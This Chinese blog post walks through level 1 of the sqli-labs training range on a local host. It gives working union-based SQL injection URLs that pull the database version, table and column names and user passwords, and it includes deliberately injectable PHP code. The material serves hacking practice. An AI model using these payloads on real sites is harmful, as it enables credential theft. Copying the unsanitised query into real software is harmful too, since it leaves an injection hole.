mysql注入单引号被过滤_sqli-labs-master第一关:基于错误的GET单引号字符型注入

最新推荐文章于 2024-02-24 14:10:23 发布
最新推荐文章于 2024-02-24 14:10:23 发布
阅读量418 收藏
点赞数
文章标签: mysql注入单引号被过滤
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33370255/article/details/114349794
版权
本篇博客详细介绍了如何利用SQL注入技巧,当单引号被过滤时,通过错误回显和盲注等方法,逐步探测数据库版本、字段数、数据库名、表名及表内数据,最终获取到`sqli-labs`第一关的用户信息。涉及的URL请求和响应揭示了整个过程。
摘要由CSDN通过智能技术生成

首先来到第一关:

a56e62a10ca46d45a0b30d351e630f4a.png

可以看到sql语句出错了。

926fb10a529f2750554c9872557e5b90.png

用 and 1 = 1去测试:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  and 1 = 1 %23 回显正常

%23是“#”注释

d1c5c095131e18c12ae8d78ef21c65ef.png

用 and 1 = 2 去测试:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  and 1 = 2 %23 回显示失败,说明存在注入点。

1eac6104f06cf4ceff73d7017c815b43.png

判断字段:

当order by 3 的时候,回显正常:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 %23

dca5bf2de2f1ab6af37a9b2bb57d42c0.png

当order by 4 的时候,回显不正常:

4a23a36840acc48f7a3a2c51100bfe0e.png

说明字段是3。

报错显示回显库:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'  union select 1,2,3 %23

回显的地方是2和3。

24deb0873e8e0c0594314117849fb497.png

用version()看版本:

用database()看当前网站使用的数据库:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'  union select 1,version(), database() %23

通过下图可以看到,使用的php版本是5.5.53,该网站使用的数据库名字是security

f6dcd3d2b2fcf26d1935c4de0f7fc735.png

添加?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23 使用过滤查询语句where查看security数据库内的表

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23

看到有四个表:

d996f62c905fcbce426ed76a750b045a.png

查看users表内的列

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23

d1abce16c4d921baf105320ab4533ef5.png

查看username和password里的内容:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users %23

9a41b13ae0b686a5b170cf5595674d5e.png

我们在看到users表里还看到了id,我们看看有多少组账号密码

只需要在后面加上 where id = n即可

经过测试 id 最大是14

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users  where id = 1%23

64823daf0f1f5cde1e77bef51097bbf3.png

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users  where id = 14%23

0a001c86392bfb801c18a39b0de3c284.png

第一关结束:

第二关很快更新。

声明:官方源码被我改动了。附上我改动的php代码:<?php

//including the Mysql connect parameters.

include("../sql-connections/sql-connect.php");

error_reporting(0);

// take the variables

if(isset($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('result.txt','a');

fwrite($fp,'ID:'.$id."\n");

fclose($fp);

// connectivity

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

echo $sql;

echo "
";

if($row)

{

echo "";

echo 'Your Login name:'. $row['username'];

echo "
";

echo 'Your Password:' .$row['password'];

echo "";

}

else

{

echo '';

print_r(mysql_error());

echo "";

}

}

else { echo "Please input the ID as parameter with numeric value";}

?>

微信公众号:

Leezix
关注
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1734
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs-master第一关Less-1Error based - Single quotes - String
weixin_45492475的博客
08-19 398
sqli-labs-master第一关Less-1Error based - Single quotes - String 一、首先进入目标网站,查看显示输入正确时的页面 根据下面提示,输入id值,当我们输入?id=1时得到了一个正确的返回界面 二、判断注入点 1、?id=1’ 判断注入点处是数字型还是字符型,在正确语句后加入一个单引号后,发现报错信息为 ‘‘1’’ LIMIT 0,1’ at...
SQL注入中绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
过滤单引号
huwei181的专栏
09-24 1138
Function sqlstr(data) if data  sqlstr="" & replace(data,"","") & "" else  sqlstr="" & "" & "" end ifEnd Function请高手指点一下sqlstr后面的代码是什么意思?(replace函数的意思我明白,一长串在一块我就不太明白了。)谢谢!
mysql 过滤单引号 注入_过滤单引证明过滤单引号的ORDER BY可以注入
weixin_32683881的博客
01-19 525
已知:代码如下,有注入无悬念。$sortColumn = mysqli_real_escape_string($_GET['sort_column']);$query ="SELECT * from cr0_3WHERE active = true ORDER BY $sortColumn DESC";?>推理:1.可以测试通过手段判断cr0_3的字段数量。不知道怎么做,就不要往下看了。2...
SQL注入 单引号类型+空格过滤
Auroraxsn的博客
04-24 2083
初始页面: 1.判断注入类型 ?name=root' 页面返回异常,既没有表格内容也没有表格的列名 ?name=root" 页面返回正常,没有表格内容但有表格列名,判断为单引号类型 ?name=root'--+ 页面报错,显示“ERROR NO SPACE”,猜测可能有空格过滤 ?name=root'%23 ?name=root'/**/' ?name=root'and(1=1)%23 页面返回正常,即有表格内容又有表格列名,判断为空格过滤 ...
SQL手工注入漏洞测试(MySQL数据库-字符型
m0_67399862的博客
05-13 313
打开题目后出现改主页,点击下面的通知 看到id名为字符串,需要留意,将id名改为任意字符串报错,说明有注入点 发现直接用order by语句不能进行猜解 尝试使用单引号(‘)闭合前面的单引号,让SQL语句能执行 通过order by语句可猜解出字段数为4 使用union select进行联合查询,发现1,2,3,4没有显示 所以在id前的字符串加上负号 因为只显示出2,3,所以用想查询的信息替换数字2,3 由查询得,数据库名为mozhe_disc...
SQL注入字符型、数字型注入原理及注入步骤(sqli-labs-master 1-2关)
qiqi_w的博客
11-27 6495
SQL注入字符型、数字型注入原理及注入步骤 sqli-labs-master 1-2关演示截图
sqli-labs实验指导手册
11-17
sqli-labs是一个专门设计的实验平台,用于教育和实践SQL注入技术。以下是对sqli-labs实验指导手册中涉及的SQL注入知识点的详细说明: 1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2189
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
mysql错误回显注入_基于错误回显的sql注入整理
weixin_36031047的博客
01-19 327
由于复习,停了好几天,今天换换模式做了一下关于错误回显的ctf题目,首先附上题目:here整理了一下网上的一些关于错误回显的方法,在这里就不带上地址了,请大牛们原谅:P0x00 关于错误回显用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你就偷着乐吧)。0x01 用于错误回显...
mysql注入单引号过滤_避开sql注入过滤的几个方法
weixin_33375360的博客
02-05 7040
有的时候,很容易受到SQL注入攻击的程序,可能会进行输入过滤,用来防止攻击者无限制的利用其中存在的设计缺陷。唱出会删除或者净化一些字符,或者阻止常用的sql关键词。我们通常有以下几种技巧,去避开这些过滤。1,避免使用被阻止的字符,即不使用这些字符仍然达到攻击目的。A,如果注入一个数字数据字段,就不需要使用单引号。B,输入注释符号被阻止使用,我们可以设计注入的数据,既不破坏周围的查询语法。目的其实很...
sqli-labs-master第一关:基于错误GET单引号字符型注入
m_ing
05-07 472
前言:这几天时间就和大家一起研究sqli-labs-master,一起闯关。至于sqli-labs-master的环境搭建我这里就不演示了,可以参考https://blog.csdn.net/Litbai_zhang 的博客自行搭建。 首先来到第一关 http://192.168.89.131/sqli-labs-master/Less-1/ 都知道第一关是基于错误get注入 先来了解什么...
SQL注入过滤单引号是否无解
热门推荐
u012064609的专栏
12-18 2万+
sql注入攻击能够得逞,往往是因为前台页面传递的参数含有非法字符,导致sql原有逻辑发生改变。如经典的登录验证例子 程序处理:select * from tableXX where username
sql注入时带引号屏蔽的怎么处理
Huamang的博客
02-09 5483
写了学长给的一个题目,第一关就是一个sql注入,但是尝试了万能密码是不管用的,因为题目把单引号过滤掉了,无法使用单引号来闭合 $sql = "SELECT username, password FROM user WHERE username='" .$user ."' && password='" .$pass ."'"; 要想闭合sql语句加上or 1=1#来使判断条件为真,我学到了一个操作:使用\转义 用\转义后面的单引号 在用户名框输入\,密码框输入or 1=1 #,这样提交后,
SQL注入遇到过滤,二次注入
qq_61412565的博客
08-13 1251
SQL注入总不能一帆风顺,对面有时候会有一些防御,过安全狗宝塔那些先且不谈,就是过滤注释符号的时候。(新注意到一个知识点,get传参有urf编码,而post没有)应对方法有:因为注释符不起效,所以灵活用or,构造 or '1' ='1,来把后面的’给过滤掉,(但这是知道靶场源码做出来的方式,实战怎么搞呢)。上面一步是默认把字符型数字型测出来了,那么要记得该测列数和回显位了(这里居然忘了该有这步,真是不器用),以前常规的做法是 and order by 1234,这样不停换数字看他报错的嘛。
SQL注入 Less23(过滤注释符)
开心星人的博客
07-24 1699
先去掉左右两边各一个单引号,相当于语文中的引用。因为过滤了注释符,我们可以手动闭合后面的单引号。尝试使用union注入,因为是有回显点的。想使用报错注入的,因为是会有报错信息的。直接使用union,来逐个测试字段数。很明显知道是单引号闭合。这部分,导致语句出错了。...
通过两道CTF题学习过滤单引号SQL注入
Lethe's Blog
03-24 1万+
0x00 前言 通常来说,在进行字符型SQL注入时,都需要先将前面的引号等(以单引号为例)进行闭合才能执行我们构造的SQL语句,那么如果单引号过滤了,是否还能够成功的SQL注入呢? 答案是可以,当你在判断登录时使用的是如下SQL语句: select user from user where user='$_POST[username]' and password='$_POST[passwor...
sqli-labs 第一关是数字型注入还是字符型注入
最新发布
12-30
### SQLi-Labs 第一关 注入类型的分析 ...因此,SQLi-Labs第一关属于字符型而非数字型SQL注入场景。 为了进一步验证这一点,还可以尝试其他方式如直接拼接表名和列名到查询中提取数据: ```http ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值